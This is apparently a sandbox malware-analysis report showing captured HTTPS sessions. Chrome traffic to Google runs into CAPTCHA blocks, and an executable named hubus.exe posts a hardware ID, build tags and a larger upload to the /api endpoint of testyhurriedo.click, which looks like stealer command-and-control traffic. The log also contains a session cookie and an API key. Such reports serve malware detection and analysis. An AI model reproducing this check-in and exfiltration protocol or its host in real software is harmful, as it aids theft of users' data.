                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:29 UTC | 1196 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26oft%3D1%26pgcl%3D20%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgRmgZjNGKXmkrsGIjAb7Fn47Pfqq66K6PhdOlnUxTi9zJAMw9w-80fWZCRZxaXkInduKUM2DaaOHZpbOAUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                            x-hallmonitor-challenge: CgwIpeaSuwYQvN_2pAESBGaBmM0
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9PcpISI0wfs_G9KTUo3dXg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:29 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            Content-Length: 576
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
2024-12-19 23:58:29 UTC | 59 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68
                                                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/h
2024-12-19 23:58:29 UTC | 517 | IN | Data Raw: 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c 69 65 6e 74 25 33 44 63 68 72 6f 6d 65 2d 6f 6d 6e 69 25 32 36 67 73 5f 72 69 25 33 44 63 68 72 6f 6d 65 2d 65 78 74 2d 61 6e 73 67 25 32 36 78 73 73 69 25 33 44 74 25 32 36 71
                                                                                                                                                                                                                                                            Data Ascii: tml;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
3           192.168.11.20  49750        172.253.124.104  443               6932  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 23:58:29 UTC  710                OUT        GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:29 UTC  845                IN         HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGKXmkrsGIjBi_vnjRSamj0Ps8W_DTyzCERXw8ffcqRqOodjIwUl9-vkLiJC2hrtFdECb_cWTDBsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                            x-hallmonitor-challenge: CgwIpeaSuwYQn7LN0wISBGaBmM0
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:29 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            Content-Length: 458
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
2024-12-19 23:58:29 UTC  410                IN
                                                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
2024-12-19 23:58:29 UTC  48                 IN
                                                                                                                                                                                                                                                            Data Ascii: TkVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
4           192.168.11.20  49751        172.253.124.104  443               6932  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 23:58:29 UTC  553                OUT        GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:29 UTC  763                IN         HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                            x-hallmonitor-challenge: CgwIpeaSuwYQ3Pz9sAMSBGaBmM0
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:29 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            Content-Length: 417
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
2024-12-19 23:58:29 UTC  417                IN
                                                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
5           192.168.11.20  49752        172.253.124.104  443               6932  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 23:58:29 UTC  1017               OUT        GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26oft%3D1%26pgcl%3D20%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgRmgZjNGKXmkrsGIjAb7Fn47Pfqq66K6PhdOlnUxTi9zJAMw9w-80fWZCRZxaXkInduKUM2DaaOHZpbOAUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:29 UTC  356                IN         HTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:29 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                                                                                                                            Content-Length: 3601
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
2024-12-19 23:58:29 UTC  899                IN
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/complete/search?client=chrome-omn
2024-12-19 23:58:29 UTC  1255               IN
                                                                                                                                                                                                                                                            Data Ascii: able javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="reca
                                                                                                                                                                                                                                                            2024-12-19 23:58:29 UTC1255INData Raw: 73 20 62 6c 6f 63 6b 65 64 20 64 75 65 20 74 6f 20 75 6e 61 64 64 72 65 73 73 65 64 20 61 62 75 73 65 20 63 6f 6d 70 6c 61 69 6e 74 73 20 61 62 6f 75 74 20 6d 61 6c 69 63 69 6f 75 73 20 62 65 68 61 76 69 6f 72 2e 20 54 68 69 73 20 70 61 67 65 20 63 68 65 63 6b 73 20 74 6f 20 73 65 65 20 69 66 20 69 74 27 73 20 72 65 61 6c 6c 79 20 61 20 68 75 6d 61 6e 20 73 65 6e 64 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 6e 6f 74 20 61 20 72 6f 62 6f 74 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 74 68 69 73 20 6e 65 74 77 6f 72 6b 2e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61
                                                                                                                                                                                                                                                            Data Ascii: s blocked due to unaddressed abuse complaints about malicious behavior. This page checks to see if it's really a human sending the requests and not a robot coming from this network. <br><br><div id="infoDiv" style="display:none; background-color:#eee; pa
                                                                                                                                                                                                                                                            2024-12-19 23:58:29 UTC192INData Raw: 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e 69 26 61 6d 70 3b 67 73 5f 72 69 3d 63 68 72 6f 6d 65 2d 65 78 74 2d 61 6e 73 67 26 61 6d 70 3b 78 73 73 69 3d 74 26 61 6d 70 3b 71 3d 26 61 6d 70 3b 6f 69 74 3d 30 26 61 6d 70 3b 6f 66 74 3d 31 26 61 6d 70 3b 70 67 63 6c 3d 32 30 26 61 6d 70 3b 67 73 5f 72 6e 3d 34 32 26 61 6d 70 3b 73 75 67 6b 65 79 3d 41 49 7a 61 53 79 42 4f 74 69 34 6d 4d 2d 36 78 39 57 44 6e 5a 49 6a 49 65 79 45 55 32 31 4f 70 42 58 71 57 42 67 77 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: lient=chrome-omni&amp;gs_ri=chrome-ext-ansg&amp;xssi=t&amp;q=&amp;oit=0&amp;oft=1&amp;pgcl=20&amp;gs_rn=42&amp;sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw<br></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49753 | 172.253.124.104 | 443 | 6932 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:29 UTC | 901 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGKXmkrsGIjBi_vnjRSamj0Ps8W_DTyzCERXw8ffcqRqOodjIwUl9-vkLiJC2hrtFdECb_cWTDBsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:30 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
Date: Thu, 19 Dec 2024 23:58:30 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3208
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-12-19 23:58:30 UTC | 899 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
2024-12-19 23:58:30 UTC | 1255 | IN | Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="tbfl3etj4
2024-12-19 23:58:30 UTC | 1054 | IN | Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49754 | 172.253.124.104 | 443 | 6932 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:30 UTC | 727 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-19 23:58:30 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
Date: Thu, 19 Dec 2024 23:58:30 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3136
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-12-19 23:58:30 UTC | 899 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-12-19 23:58:30 UTC | 1255 | IN | Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="ngU22wi1OH3tGD_7EuUTYPKXIymu_o3rT
2024-12-19 23:58:30 UTC | 982 | IN | Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49760 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:34 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=VAOSTAXSSS8E17D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 698
Host: testyhurriedo.click
2024-12-19 23:58:34 UTC | 698 | OUT | Data Ascii: --VAOSTAXSSS8E17DContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--VAOSTAXSSS8E17DContent-Disposition: form-data; name="pid"1--VAOSTAXSSS8E17DContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--VAOS
2024-12-19 23:58:34 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=fqe59ng267dp3aobnfklpnn9u2; expires=Mon, 14 Apr 2025 17:45:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUIwvoi8q2ShSGIaFNiXICdr1k7ufUp9GXH70JpcTNHXUpK1Bx%2F3W2UgnhEs7tDMdU85%2F3Jsp1QhGodk%2Bl%2Ft1MuA0vztcwSNhn9kJ84iGXNEKzZniDnTerAaXT6YgU5rqg%2BXoT1g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57686a1932ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135524&min_rtt=135380&rtt_var=28638&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1614&delivery_rate=28268&cwnd=252&unsent_bytes=0&cid=7024e91334d5dc6c&ts=721&x=0"
2024-12-19 23:58:34 UTC | 24 | IN | Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 12ok 102.129.152.205
2024-12-19 23:58:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49761 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:35 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QQV4MUKP
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20785
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
2024-12-19 23:58:35 UTC | 15331 | OUT | Data Raw: 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 51 51 56 34 4d 55 4b 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                                                                                                                                            Data Ascii: --QQV4MUKPContent-Disposition: form-data; name="hwid"A4331A8BB129FD4CDB71E32F12885CB3--QQV4MUKPContent-Disposition: form-data; name="pid"2--QQV4MUKPContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--QQV4MUKPContent-Disposi
